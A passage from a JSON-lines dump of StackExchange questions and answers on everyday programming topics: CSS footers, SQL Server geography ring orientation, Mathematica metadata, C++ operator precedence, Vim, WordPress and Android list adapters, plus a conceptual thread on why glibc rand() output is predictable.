turpis urna, rhoncus et mattis ut, dapibus eu nunc. Nunc sed aliquet nisi. Nullam ut magna non lacus adipiscing volutpat. Aenean odio mauris, consectetur quis consequat quis,\n blandit a nunc. Sed orci erat, placerat ac interdum ut, suscipit eu augue. Nunc vitae mi tortor. Ut vel justo quis lectus elementum ullamcorper volutpat vel libero.<\/p>\n <\/div>\n <div class=\"right-content\">\n <p align=\"center\">All About Me<\/p>\n <p>I'm Dick Roman and I foresee what I will become when I first time use a camera. I was eager to have my own camera and take elegant photos of my unforgettable moments in my life. It was served as my inspiration to purse and take this field of photography.\n Today I am able to render my services to my clients and I will guarantee every works I made will be best of the best<\/p>\n <ol style=\"list-style-type:none;align:center\">\n <p>Today I am rendering my skills as a:<\/p>\n <li>Image Editor<\/li>\n <li>Landscape Photograher<\/li>\n <li>Video Editor<\/li>\n <li>Web Designer<\/li>\n <\/ol>\n\n <p align=\"center\">You could drop-by to my social media profiles<\/p>\n <p align=\"center\">Just click on any links below to visit my account<\/p>\n\n <ul style=\"list-style-type:none\">\n <li>\n <a href=\"#\">Facebook<\/a>\n <\/li>\n <li><a href=\"#\">Twitter<\/a>\n <\/li>\n <li><a href=\"#\">Instagram<\/a>\n <\/li>\n <\/ul>\n <\/div>\n <\/div>\n\n <div class=\"footer\">\n <div class=\"footer-left\">\n <p>©Copyright 2016 - Codeblocks Design<\/p>\n <\/div>\n\n\n <div class=\"footer-right\">\n <p>\n <a href=\"#\">\n <img src=\"fb.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"twitter.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"instagram.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"google.png\" height=\"60%\">\n <\/a>\n <\/p>\n <\/div>\n <\/div>\n\n <\/div>\n<\/body><\/code>\nComment: Sticky does not mean fixed.\nComment: Is there any change not to use a position:fixed on the footer section? \nAs it stick even on the top position.\nI want the footer section just visible when scroll down to the bottom part\nAnswer: One easy way is to put your footer's content in a <code><footer><\/code> tag. Then apply <code>position:fixed;<\/code> to let the footer stick to the bottom.\nIf there are any margin issues after that, add this to the top of the styling\n<code>*{\n margin:0;\n}\n<\/code>\nComment: Well thank you sir .\nI apply it to my css and works like a charm\n","meta":{"source":"stackoverflow","title":"Sticky Footer not fully stick on the bottom","dup_signals":{}},"subset":"stackexchange"} +{"text":"SQL Spatial polygon inside out\n\nQuestion: I am allowing users to draw a polygon in Silverlight by clicking to draw. Then I loop through the points, convert them to longitude and latitude and then save to SQL (in a <code>geography<\/code> column).\nThe problem is that because of the world being round and all that, it only works if the user draws clockwise. Otherwise it tries to make the polygon right round the world and fails.\nSo how do I do this correctly? Do I have to work out which way they are drawing, and if so how?\nAnswer: You can check, if the result of the <code>EnvelopeAngle()<\/code> method for the geography was 180, then use the <code>ReorientObject()<\/code> function to correct it.\nHere is the sample:\n<code>--A CW polygon\nDECLARE @G3 GEOGRAPHY = 'POLYGON ((45 45, 44 45, 44 46, 45 46, 45 45))'; \nSELECT @G3.EnvelopeAngle(); --180\nSELECT @G3.ReorientObject().STAsText(); --POLYGON ((44 46, 44 45, 45 45, 45 46, 44 46))\n<\/code>\nEDIT as stated in the comments you may correct current geometries, using a simple update command (in the case you are sure they are not correct):\n<code>UPDATE foo_table SET bar_column = bar_column.ReorientObject() \n WHERE bar_column.EnvelopeAngle() > 90\n<\/code>\nComment: If you have existing entries the following query helps: `UPDATE foo_table SET bar_column = bar_column.ReorientObject() WHERE bar_column.EnvelopeAngle() > 90`\nComment: Excelent answer. You just saved my day.\nComment: @Pabloker glad to be helpful. You may want to see this too [link](http:\/\/stackoverflow.com\/a\/30389579\/1468295)\nAnswer: I asked a similar question recently at the GIS StackExchange. I believe I have found a SQL-only solution, which is reproduced below:\nEventually found the answer at Spatial Ed's Blog.\nSQL demonstrating the transform:\n<code>DECLARE @geom GEOMETRY = 'POLYGON ((0 0, 10 0, 10 10, 0 10, 0 0))';\nDECLARE @geog GEOGRAPHY = @geom.MakeValid().STUnion(@geom.STStartPoint()).STAsText()\n<\/code>\nAnd excerpt from Ed's post:\n\nThe key to this behavior is the the <code>STUnion()<\/code> method. Since this is an OGC-based method, working on the entire geometry for a given feature, it forces polygons into the orientation required for the method - which just happens to be the one used for the <code>Geography type<\/code> [...]. This method illustrated is quite efficient, keeping overhead small [...].\nComment: Ohh I see. I'm supposed to do it on the geometry\nComment: How did you get this working on 2008. I'm getting 'Could not find method 'MakeValid' for type 'Microsoft.SqlServer.Types.SqlGeography''\nComment: @capdragon: Did you try `MakeValid()` on a `geometry` or a `geography`?\nComment: Geography. I'm in a similar situation as you. I have Geometry, projected and converted to Geography in a separate feature class but now I get errors of \"Each geography instance must fit inside a single hemisphere. A common reason for this error is that a polygon has the wrong ring orientation.\"\nComment: How do I do this with a variable selection? For example, my POLYGON((X Y, X Y, X Y)) string is in a table. I'm not going to be manually declaring each polygon.\nComment: @ZacharyOrdo-GISP Is your `polygon` a string or a `geometry` object. If the latter, you can perhaps `CAST(foo_column.MakeValid().StUnion(foo_column.STStartPoint()).STAsText() AS GEOGRAPHY)`. Secondly, if you are on any version of SQL Server above 2008, use [the link](http:\/\/alastaira.wordpress.com\/2012\/01\/27\/ring-orientation-bigger-than-a-hemisphere-polygons-and-the-reorientobject-method-in-sql-server-2012\/) with `ReorientObject()` from [my question on GIS.SE](https:\/\/gis.stackexchange.com\/q\/66671\/20145). Lastly, if you can, do the reorientation _before save_ rather than on read.\nAnswer: If you are tied to RTM version of SqlServer 2008 you can always use sqlspatial tools from codeplex that is freely distributable and from that library just use makevalid method.\nIf you have time to play with CTP1 of SqlServer Denali you can just pickup new spatial types that can accept objects larger than a hemisphere and that have ReorientObject method to - Reorient Object if needed :)\nAnswer: That is a common concept within geospatial geography data types, a polygon is defined by a number of vertices and the edges between those vertices. However, you have to be able to distinguish between what is inside and outside of the polygon. This is done by the system assuming that one side of the edge will always be defining the inside (Different standards use left side or right side)\nIn one direction you have drawn a small circle, in the other direction you have drawn a sphere that encompasses the entire world, except for a small circle. The latter would tend to break geographic limits and raise an exception.\nIf you consider trying to draw a doughnut, you have 2 polygons and have to have the points in a clockwise \/ anti-clockwise pattern, to define the 'hole' within the centre.\nComment: Yes, I realise that. But what do I do about it?\nComment: you have to ignore the order the points are drawn, but read them in the appropriate order.\nComment: Number of posts on stackoverflow asking that before : http:\/\/stackoverflow.com\/questions\/242404\/sort-four-points-in-clockwise-order for example\nAnswer: Left hand rule governs this... as you 'walk' the perimeter of your polygon, your left hand must always be inside... so things should 'appear' to be digitized counter-clockwise. this hold true for donuts and polys with holes as well.\nif you keep your left hand 'inside' the polygon area you are interested in, they will be digitized in a clockwise fashion.\nA simple way to determine which one is correct is to always take the one with the SMALLER area... in just about any workflow I can thing of, there are no polygons that would be digitized that are larger than half the world...\nThe workflow would go like this: have your users create their polygons, create another polygon with the opposite orientation (ReorientObject () in SQL Server) and then compare their areas... Logically, the smallest is correct.\nJust another way to solve this.\n","meta":{"source":"stackoverflow","title":"SQL Spatial polygon inside out","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to stop running task in Automation Anywhere Enterprise Client?\n\nQuestion: I started running process and now I can't stop it. I can't start running any other process while the first one is still running, but I can't stop it either. Tried on Esc, ctrl+alt+f4 or ctrl+alt+delete, pause and x. Does somebody have a solution for this problem?\nAnswer: Open task manager and kill the <code>AAPlayer.exe<\/code> process.\n","meta":{"source":"stackoverflow","title":"How to stop running task in Automation Anywhere Enterprise Client?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to crack g++ rand()?\n\nQuestion: So, I have this:\nI know that some code was used to generate a random sequence, and it looked roughly like this:\n<code>#include <iostream>\n#include <string>\n\nint main() {\n const std::string alphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\n std::string temp = \"1234567890\";\n srand(MAGICNUMBER);\n for (int i = 0;; ++i) {\n for (int j = 0; j < 10; ++j) {\n temp[j] = alphabet[rand() % alphabet.size()];\n }\n std::cout << temp << std::endl;\n }\n}\n<\/code>\nIt was used to generate a sequence of 124660967 strings, the last of which was \"2lwd9JjVnE\", and then stopped. The compilator used was 64-bit g++ 4.8 for Linux. What I want is to find the 124660968th string \u2013 that is, the one that would have been printed next. The caveat, of course, is that I don't know the <code>MAGICNUMBER<\/code>. I'm pretty sure that it's possible to brute-force all possibilities, but it would take millennia, it seems. I've tried to snoop around in <code>rand()<\/code> source code, but I don't really understand it, much less exploit it. Is it possible to find that string in more or less reasonable time?\nUPD Is it even possible to generate what is supposed to go after my string without finding out the seed?\nComment: The compiler is (or *should be*) irrelevant in this case. The interesting part is the libc, because that's where rand() is implemented. And the seed is \"only\" an `unsigned int`...\nComment: @MichaelKj\u00f6rling Well, the standard does _not_ provide any details on how random should be implemented, so the compiler seems to be quite relevant, or am I wrong?\nComment: You are confusing the compiler with the standard library. The compiler only cares about (in this case) C++ *keywords*, whereas the standard library builds on top of that to make it easier to implement useful functionality by providing things like `cout`, `rand()`, `std::string` and so on.\nComment: @MichaelKj\u00f6rling, ah, I see, okay; learned something new today, I guess\nComment: Related, except about C, not C++: [How to predict C rand()?](http:\/\/security.stackexchange.com\/q\/31643\/2138)\nComment: **Why** do you want to find the one that comes next? Why can't you just generate a new random value? Note that the method isn't completely secure anyways, since `rand()` doesn't return crypto-level results, and the mod afterwards will skew to one side (since the range of the random is not a multiple of the alphabet size).\nComment: Repost? https:\/\/stackoverflow.com\/questions\/35299865\/is-there-a-way-to-find-the-next-item-in-random-sequence \n\nAnyway, `srand()` takes an unsigned integer, so why not just search the binary or memory for the number? Once you know the *MAGICNUMBER*, you can easily predict what comes next because it follows a set formula to generate random numbers. However, if you are wanting to reverse the PRNG without *MAGICNUMBER*, using only the known outputs, I suppose it is possible, but difficult. You would need to determine the internal state when the last random number was generated\nAnswer: The compiler itself is irrelevant; the <code>rand()<\/code> function is implemented in libc.\nThe glibc implementation uses a linear congruential generator (LCG) or a linear feedback shift register (LFSR) for its <code>rand()<\/code>. These can be quite easily cracked given some of the outputs (which it seems you have). The details can be found in the answer to another question already asked here, but the crux is that LCGs and LFSRs are not secure and some simple maths and probability can gain you the right answer pretty quickly.\nYou'll need to work out which version of glibc was used, but the compiler version should give you a rough idea of the patch state of the system, so you can infer it from that.\nYou can find more resources on Google, but here's a quick set of links to help:\n\nLCGs on Wikipedia\nLFSRs on Wikipedia\nCracking PHP's rand() [PDF] - relevant because it uses the glibc function for rand(), and this is covered in the paper.\nUntwister - PRNG seed recovery tool with support for rand()\nSnowflake - Another PRNG seed recovery tool\nComment: ...and this is why you should use a cryptographically secure RNG for any situation where people guessing the output is a problem. This doesn't just apply to cryptography, but also to online gaming and especially online gambling.\nComment: I suspect this is a challenge of sorts, which is why I didn't provide a \"this is how you win\" walkthrough answer. And also because that's a lot of effort. But regardless, you're right - LCG\/LFSR designs simply aren't of the right quality for security purposes.\nAnswer: Google says:\n\nIn order to generate random-like numbers, <code>srand<\/code> is usually initialized to some distinctive runtime value, like the value returned by function <code>time<\/code> (declared in header <code><ctime\\><\/code>). This is distinctive enough for most trivial randomization needs.\n\nIf this technique is used and you know a more or less close estimate of the time (like, if you can narrow it down to a day), a brute force attack on the left input space will probably be feasible.\nOther than that, if you follow google some more you find a series of blog entries that might lead you down the right track.\nComment: Nope, I know for granted that the seed was not time-related; so that won't work.\n\nSecondly, as I understood, `rand()` can use Mersenne Twister, but by default it is \"Linear feedback shift register\" as google and source code tell me, so that blog post doesn't seem to help much as well\nComment: The other posts in that series handle the linear congruential PRNG.\n","meta":{"source":"security.stackexchange","title":"Is it possible to crack g++ rand()?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Setting and changing MetaInformation for arbitrary objects\n\nQuestion: I work with a lot of dynamic data in <code>{{date, datum}. . .}<\/code> format,\n<code>datedatalist={{{2001, 1, 1}, 45.2}, {{2002, 1, 1}, 132.}, {{2003, 1, 2}, 121.1}};\n<\/code>\nand I have historically attached a header to each object in a format like\n<code>datedataObject={{header version, data series name, type (value, % change, etc.)}, datedatalist};\n<\/code>\nI can see advantages to using Mathematica's TemporalData[] type, and to using MetaInformation[] for recording the header. I would set this up with something like\n<code>newObject = TemporalData[datedatalist, MetaInformation -> {\"name\" -> \"whatever\", \"type\" -> \"value\"}];\n<\/code>\nand extract header items with, for example\n<code>newObject[\"name\"]\n<\/code>\nBut this leaves me with two puzzles,\n\nHow do I add MetaInformation after the object has been created? and\nHow do I change existing MetaInformation?\nAnswer: What about this?\nLoad your sample data\n<code>datedatalist={{{2001, 1, 1}, 45.2}, {{2002, 1, 1}, 132.}, {{2003, 1, 2}, 121.1}};\nct = TemporalData[datedatalist, MetaInformation -> {\"name\" -> \"whatever\", \"type\" -> \"value\"}];\n<\/code>\nModify its meta information\n<code>ct=TemporalData[ct, MetaInformation->{\"name\"->\"Johnny\", \"fat\"->True}];\nct[\"MetaInformation\"]\n(* {\"name\" -> \"Johnny\", \"fat\" -> True, \"type\" -> \"value\"} *)\n<\/code>\nComment: @MichaelStern luck. I just felt it was sensible for nested temporal data's to be flattened out, tried it and worked.\nComment: To make this more general I would suggest to use the information contained in the first part of the `TemporalData` object. For example, `addMetaInformation[ td_, metarules_ ] := Which[ td[[1]] === TimeSeries, TimeSeries[ td, MetaInformation -> metarules], ...=== EventSeries, EventSeries[...], True, TemporalData[ td, MetaInformation -> metarules ]`. Also one might define `addMetaInformation[ td_, None] := td \/. (MetaInformation -> _) :> Sequence[]`.\nComment: Very nice. How did you figure that out?\nAnswer: I sure hope there is a cleaner way to get both tasks than the following which is based on accessing and changing <code>Part<\/code>s of a temporal data object:\n<code> s = Accumulate[\n RandomInteger[{-5, 1}, 10]~Join~RandomInteger[{-1, 5}, 10]]; \n td = TemporalData[s, {1, 20}];\n td[\"Properties\"]\n(* {\"Part\",\"Path\",\"PathComponents\",\"PathCount\",\"PathFunction\",\n \"PathFunctions\",\"PathLengths\",\"Paths\",\"PathStates\",\"PathTimes\",\n \"Properties\",\"SliceData\",\"SliceDistribution\",\"StateDimensions\",\n \"States\",\"Times\"} *)\n<\/code>\nAdd <code>MetaInformation<\/code>:\n<code> td[[2, -1]] = AppendTo[td[[2, -1]], MetaInformation -> {\"Event\" -> 10}];\n td[\"Properties\"]\n (* {\"Event\",\"Part\",\"Path\",\"PathComponents\",\"PathCount\",\"PathFunction\",\n \"PathFunctions\",\"PathLengths\",\"Paths\",\"PathStates\",\"PathTimes\",\n \"Properties\",\"SliceData\",\"SliceDistribution\",\"StateDimensions\",\n \"States\",\"Times\"} *)\n\n td[\"Event\"]\n (* 10 *)\n<\/code>\nChange the value of a <code>MetaInformation<\/code> element:\n<code> d[[2, -1, 1, 2, 1, 2]] = 20;\n td[\"Event\"]\n (* 20 *)\n<\/code>\nAdd another <code>MetaInformation<\/code> element:\n<code> td[[2, -1, 1, 2]] = AppendTo[td[[2, -1, 1, 2]], \"name\" -> \"abc\"]; \n td[\"MetaInformation\"]\n (*{\"Event\" -> 20,\"name\" ->\"abc\"} *)\n td[\"name\"]\n (* \"abc\" *)\n<\/code>\nNote: This approach works in version 220.127.116.11. Version 10 seems to have quite a few new features related to <code>TemporalData<\/code>. However, documentation information related to <code>MetaInformation<\/code> has not changed.\nComment: This works in V10, not in V9: `td = TemporalData[td, \"MetaInformation\" -> {\"Event\" -> 20}]`\nComment: @MichaelE2, right. `MetaInformation->...\" (without string quotes) also works in Version 10. Although documentation on `MetaInformation` says the values can be changed using `SetOptions` it does not work for `TemporalData`. And, although `MetaInformation` is listed as an `Option` for `TemporalData`, `Options[td]` gives `{}`; and one needs to use `td[\"Options\"]` to get `MetaInformation -> {...}`.\nComment: Yes, the quotes were a typo that happened to work.\nComment: I think the ultimate solution will have to come from Wolfram, but I appreciate the kludge in the meantime.\nAnswer: David Reiss came up with a nice kludge over in the Wolfram Communities --\n<code>newObject = newObject \/. {(\"name\" -> _) :> (\"name\" -> \"Happy feet\")}\n<\/code>\nchanges the \"name\" part of the MetaInformation in newObject. And\n<code>newObject = \n newObject \/. {(MetaInformation -> x_) :> (MetaInformation -> Flatten[{x, \"another\" -> \"Something\"}])} \n<\/code>\nadds the \"another\" -> \"Something\" rule to the MetaInformation of newObject.\nThis does seem like a bug in Mathematica though; the behavior is illogical and at odds with the documentation.\nComment: Seems to me that if designed \"properly\" it should work with `SetOptions` and also probably `CurrentValue` (analogous to how `TaggingRules` works). I wonder if this is a bug or intentional? Have you asked tech support about this?\nComment: I reported this as a bug. They haven't responded, but I don't think I ever get responses to bug reports.\nComment: They never use the word \"bug\" but normally I get a reply saying that it has been forwarded to developers and I'll be emailed when an update occurs ...or words to that effect.\nComment: I had an exchange with tech support and provided them with a detailed notebook. They have \"reported this issue into [their] database.\"\nComment: @MikeHoneychurch Hah. Tech support says that this behavior is \"by design.\" I asked them to record it as a bug anyway.\nComment: WTF! So they are now designing things that are broken???\nComment: @MikeHoneychurch I think the tech support person may not have been one of Wolfram's best. With any luck, my example notebook will filter through to a developer.\n","meta":{"source":"mathematica.stackexchange","title":"Setting and changing MetaInformation for arbitrary objects","dup_signals":{}},"subset":"stackexchange"} +{"text":"Xpages getting field value knowing the UNID of the document\n\nQuestion: Is there a way I can get the field value of a document if I know the document UNID?\nI have the following code:\n<code>var a = database.getDocumentByUNID(sessionScope.unid);\n<\/code>\n\nsessionScope.unid contains the documentUNID.\n\nI can't see any methods avaible if I do <code>a.<\/code> . Is there something wrong?\nAnswer: SSJS does not provide typeahead unless you specifically cast variables as the class you wish to use. So to get typeahead you need to use:\n<code>var a:NotesDocument = database.getDocumentByUNID(sessionScope.unid);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Xpages getting field value knowing the UNID of the document","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set expires headers without enabling mod_expires or mod_headers possible in php?\n\nQuestion: I'm building a guestbook in php. When I checked the page with a SEO-checker it said that I should set expires headers. It's the very first time I'm working with expires headers and I've tried adding them in the .htaccess-file which failed as neither mod_expires nor mod_headers is on on the server and I won't be able to change it. My question is, if there is a possibility to set these expires headers in my php code without having mod_expires or mod_headers on? If so, how would I have to implement it in my code so that it'll work? And if you want to give me the answer \"with header(....)\" please explain how to set this up and where to put this, I don't just wanna copy-paste code, I want to learn how to do it.\nI would like to set expires headers for images (jpg\/jpeg\/gif\/png) as well (if possible) for my stylesheet (css).\nDown below I listed the questions on StackOverflow which I've already checked, but some of them are really hard to understand for a newbie like me or they never really get an answer. Some of them never say where to implement the code snippets, which makes it hard to use an accepted answer.\nI'm very new with programming web-pages, so please write explanations why I should do what, so I'll learn it for the future. If you need any more information, please don't hesitate to write so in the comments. I'll try to answer whatever I can. Thank you.\n(Already checked questions:\n\nExpires Headers Not Working\nSetup HTTP expires headers using PHP and Apache\nAdd expires header without mod_expires?\nHow do I configure apache - that has not got mod_expires or mod_headers - to send expiry headers?\nApache: How to add Expires headers to files without mod_expires installed\nand some more...\n\n)\nPHP-Version: 7.0.10\n(PS: I don't know why mod_headers and mod_expires aren't on, but I'm sure that the company won't change it just for my small project.)\nAnswer: You cannot set something with PHP where PHP is not involved in. Generally your webserver serve images and static files, so the webserver have to handle the expire headers for you. All other things, for example serve images with PHP is really not recommended and requires a lot more work than just configuring the webserver properly.\nSo, expire headers for static files (images, javascript, etc...) is managed by your webserver, not PHP.\nTip: On most default webhosting services is apache installed, so you can use a <code>.htaccess<\/code> file to set those things properly.\nEdit, more explanation:\nYou must difference between for what files you want to set expire headers. For sure, you can set expire header in your PHP files too but this only affect the pages that are served from PHP. And php is mostly used to display dynamic web pages, so an expire header here makes no sense. Static images and all those files never get passed to PHP so you have to set expire in the webserver config. And because images and other static files are static files that not change (or not often) it is recommend to set expire header to allow the browser to cache it properly\nComment: @Kathara You must difference between for what files you want to set expire headers. For sure, you can set expire header in your PHP files too but this only affect the pages that are served from PHP. And php is mostly used to display dynamic web pages, so an expire header here makes no sense. Static images and all those files never get passed to PHP so you have to set expire in the webserver config. And because images and other static files are `static` files that not change (or not often) it is recommend to set expire header to allow the browser to cache it properly.\nComment: why would you set expires headers in the first place then? And why in some answers I saw them set expires headers in php? Also I already wrote that I tried to use the .htaccess file which didn't work as neither mod_expires nor mod_headers are enabled....\nComment: Thanks for the clarifications. You wouldn't know of any other way to set the expires headers without mod_expires or mod_headers?\nComment: @Kathara With apache, there is not other way as far as i know. If your hosting provider don't support that and not will give you such features, i recommend to switch. This are basic's that every provider should provide.\nComment: Thank you very much for your help. I'll mark your answer as correct as you helped me clarify this. I'll see if I can get my company to help me install the mod_expires and mod_headers on the server.\n","meta":{"source":"stackoverflow","title":"Set expires headers without enabling mod_expires or mod_headers possible in php?","dup_signals":{}},"subset":"stackexchange"} +{"text":"false || true giving 0 in MinGW Compiler v 6.3.0-1\n\nQuestion: This is a C++ program I wrote:\n<code>#include <iostream>\nusing namespace std;\n\nint main() {\n\n cout << \"\\n\" << \"false || false\" << \": \" << false || false;\n cout << \"\\n\" << \"false || true\" << \": \" << false || true;\n cout << \"\\n\" << \"true || false\" << \": \" << true || false;\n cout << \"\\n\" << \"true || true\" << \": \" << true || true;\n cout << \"\\n\" << \"false && false\" << \": \" << false && false;\n cout << \"\\n\" << \"false && true\" << \": \" << false && true;\n cout << \"\\n\" << \"true && false\" << \": \" << true && false;\n cout << \"\\n\" << \"true && true\" << \": \" << true && true;\n\n return 0;\n}\n<\/code>\nand this is the output.\n<code>false || false: 0\nfalse || true: 0\ntrue || false: 1\ntrue || true: 1\nfalse && false: 0\nfalse && true: 0\ntrue && false: 1\ntrue && true: 1\n<\/code>\nCould someone explain to me why <code>false || true<\/code> is giving <code>0<\/code> ? I am using MinGW C++ Compiler version 6.3.0-1.\nComment: Wrap the expression in parenthesis.\nComment: @0x499602D2: Oh okay. Thank you.\nAnswer: According to C++ Operator Precedence, <code>operator<<<\/code> has higher precedence than <code>operator ||<\/code> (and <code>operator &&<\/code>), so <code>cout << false || true;<\/code> will be interpreted as if <code>(cout << false) || true;<\/code>; you'll always get <code>false<\/code> to be printed out.\nTo solve the issue you should add parentheses to specify the precedence explicitly, e.g. <code>cout << (false || true);<\/code>.\nComment: Ahh okay. Got it. Thanks a lot @songyuanyao.\n","meta":{"source":"stackoverflow","title":"false || true giving 0 in MinGW Compiler v 6.3.0-1","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the difference between Gvim and Vim?\n\nQuestion: Could someone please explain to me the differences between Gvim and Vim?\nAnswer: GVim is Vim with a built-in GUI, whereas plain Vim needs a terminal emulator (like GNOME Terminal, for example) to run.\nThe built-in GUI provides several extra features to GVim. Borrowing from a post in the Vi and Vim Stack Exchange:\n\nSome features that will only work with gVim:\n\nSupports a much wider range of colors (RGB), while the terminal only supports 256 colors (see this and this).\nSome other more advanced graphical features, such as \"wiggly lines\" for spell checking, more flexible cursor shapes, etc. A terminal can\n only do \"blocks of monospaced characters\".\nEnables mouse support, if otherwise left alone (including drag-and-drop for files). Terminal Vim can also handle the mouse\n quite well, but not drag-and-drop.\nOffers a nice, customizable menu system, where each option has the corresponding Vim command listed.\ngVim can offer you scrollbars which scroll the Vim buffer (and not the Terminal scrollback).\nYou can have popup \"balloons\" (aka. \"tooltips\").\nMany terminals do not provide true italics like gVim does.\nHas integrated font support.\n\nSecondly, even if you prefer using Vim, installing a GUI version may\n offer more compile-time features than the version without, at least in\n some distros (such as <code>clipboard<\/code> and <code>clientserver<\/code> support on\n Debian-based system in <code>vim-nox<\/code> vs <code>vim-gnome<\/code>).\nThings gVim doesn't do:\n\ngVim isn't a (full) terminal emulator, so starting external programs that use a lot of terminal features won't work very well. For example\n try using <code>:!vim<\/code>, <code>:!mutt<\/code>, or <code>:!irssi<\/code> from gVim, or pressing K\n over a word (which, by default, opens the manpage for that word). Also\n see this.\nAnswer: Both GVim and Vim are the same, the difference is that Gvim offers an interface that doesn't run in a terminal window. Basically, Gvim has GUI-like menus and toolbar.\nHere are quotes from Quora that provide more information:\n\nVIM is designed for using the keyboard efficiently and not for using\nthe mouse.\nFunctionally there is no difference between VIM and GVIM. They both\nwork the same and have same keyboard sequences. VIM does not need a\nGraphical User Interface (GUI) and uses terminal shell environment to\nprovide text editing features. However GVIM (or MVIM on mac) uses X\nwindowing system (like GTK+) to provide a desktop like window\nappearance to vim with all text editing features. Performance wise\nalso both vim and gvim behave almost identically.\nApart from this, there are few addition operations supported by GVIM\nlike\n\nMore font and better text rendering support in gvim.\nGVIM has additional menu and tool bars which vim lacks\n","meta":{"source":"askubuntu","title":"What is the difference between Gvim and Vim?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Function to Change Page Title In Wordpress\n\nQuestion: I am using the below function to change the page title in wordpress. It is working on a single page (page.php), but is not working on my static home page or individual posts (single.php).\nWhat do I need to change in order to make this work across the entire site?\n<code><?php\n\nfunction wpse46249_filter_wp_title( $title ) {\n\n $some_custom_title_content = 'This is added to title';\n\n $custom_title = $title . $some_custom_title_content;\n\n return $custom_title;\n}\nadd_filter( 'wp_title', 'wpse46249_filter_wp_title' );\n?>\n<\/code>\nComment: do you want to set same page title for all posts?\nComment: @HelpingHands, no. That code is appending something to the original `$title` that is passed in.\nComment: @user1609391...this sounds like a template issue.\nComment: Can you paste the code which prints the `title` on `single.php`\nAnswer: <code>function wpse46249_filter_wp_title( $title ) {\n\n $some_custom_title_content = 'This is added to title';\n\n $custom_title = $title . $some_custom_title_content;\n\n return $custom_title;\n}\nadd_filter( 'the_title', 'wpse46249_filter_wp_title' );\n<\/code>\nplease note the title is saved in wp_posts table. The filter you used above will change all new posts titles being saved. This filter just modifys the title after pulling it from the db and doesn't actually change the db value. \nAlso will only work on pages where the_title() is called.\n","meta":{"source":"stackoverflow","title":"Function to Change Page Title In Wordpress","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why i am not able to view my Listview in android?\n\nQuestion: Im trying to pass some info from my fragment to my adapter to show a ListView and it does pass but the ListView doesnt show anything after its done loading.\nI am attaching my CustomAdapter class below. \npackage com.example.rama.hello.Adapters;\n<code>import android.app.Activity;\nimport android.content.Context;\nimport android.graphics.Bitmap;\nimport android.graphics.BitmapFactory;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.ArrayAdapter;\nimport android.widget.BaseAdapter;\nimport android.widget.ImageView;\nimport android.widget.TextView;\nimport com.example.rama.hello.Bean.RowItem;\nimport com.example.rama.hello.R;\n\nimport java.io.File;\nimport java.util.ArrayList;\nimport java.util.List;\n\n\/**\n * Created by RAMA on 10\/25\/2016.\n *\/\npublic class CustomAdapter extends ArrayAdapter<RowItem> {\n\n Context mcontext;\n ArrayList<RowItem> rowItem = new ArrayList<RowItem>();\n private RowItem row;\n RowItem data;\n\n public CustomAdapter(Context context, int resourceId,\n ArrayList<RowItem> items) {\n super(context, resourceId, items);\n this.mcontext = context;\n }\n\n @Override\n public int getCount()\n {\n return rowItem.size();\n }\n\n @Override\n public long getItemId(int position) {\n return rowItem.indexOf(getItem(position));\n }\n\n @Override\n public View getView(int position, View convertView, ViewGroup parent)\n {\n if (convertView == null)\n {\n LayoutInflater mInflater = (LayoutInflater) mcontext\n .getSystemService(Activity.LAYOUT_INFLATER_SERVICE);\n convertView = mInflater.inflate(R.layout.list_item,parent,false);\n }\n\n ImageView imgIcon = (ImageView) convertView.findViewById(R.id.icon);\n TextView txtTitle = (TextView) convertView.findViewById(R.id.title);\n TextView txtSubTitle = (TextView) convertView.findViewById(R.id.sub_title);\n TextView txtRightTitle = (TextView) convertView.findViewById(R.id.right_title);\n\n RowItem row_pos = getItem(position);\n\n \/\/ setting the image resource and title,subtitle,Righttitle\n File imgFile = new File(row_pos.getIcon());\n\n if(imgFile.exists()){\n\n Bitmap myBitmap = BitmapFactory.decodeFile(imgFile.getAbsolutePath());\n imgIcon.setImageBitmap(myBitmap);\n }\n\n if(row_pos.getTitle() == \" \")\n txtTitle.setText(row_pos.getPhone_number());\n else\n txtTitle.setText(row_pos.getTitle());\n\n txtSubTitle.setText(row_pos.getSub_title());\n txtRightTitle.setText(row_pos.getRight_title());\n\n return convertView;\n }\n}\n<\/code>\nComment: Let's keep comments related to clarification of the post and not tangential discussion. Thank you.\nAnswer: In <code>ArrayAdapter<\/code> you don't need to get a reference for your list of items (in your case list of <code>RowItem<\/code>), this is not <code>ArrayAdapter<\/code> was made for, all you need is to override <code>getView<\/code> and the <code>ArrayAdapter<\/code> will handle the list internally for you, here is how it should look like:\n<code>public class CustomAdapter extends ArrayAdapter<RowItem> {\n\n public CustomAdapter(Context context, int resourceId,\n ArrayList<RowItem> items) {\n super(context, resourceId, items);\n }\n\n @Override\n public View getView(int position, View convertView, ViewGroup parent) {\n if (convertView == null) {\n LayoutInflater mInflater = LayoutInflater.from(parent.getContext());\n convertView = mInflater.inflate(R.layout.list_item, parent, false);\n }\n\n ImageView imgIcon = (ImageView) convertView.findViewById(R.id.icon);\n TextView txtTitle = (TextView) convertView.findViewById(R.id.title);\n TextView txtSubTitle = (TextView) convertView.findViewById(R.id.sub_title);\n TextView txtRightTitle = (TextView) convertView.findViewById(R.id.right_title);\n\n RowItem row_pos = getItem(position);\n\n \/\/ setting the image resource and title,subtitle,Righttitle\n File imgFile = new File(row_pos.getIcon());\n\n if (imgFile.exists()) {\n\n Bitmap myBitmap = BitmapFactory.decodeFile(imgFile.getAbsolutePath());\n imgIcon.setImageBitmap(myBitmap);\n }\n\n if (row_pos.getTitle() == \" \")\n txtTitle.setText(row_pos.getPhone_number());\n else\n txtTitle.setText(row_pos.getTitle());\n\n txtSubTitle.setText(row_pos.getSub_title());\n txtRightTitle.setText(row_pos.getRight_title());\n\n return convertView;\n }\n 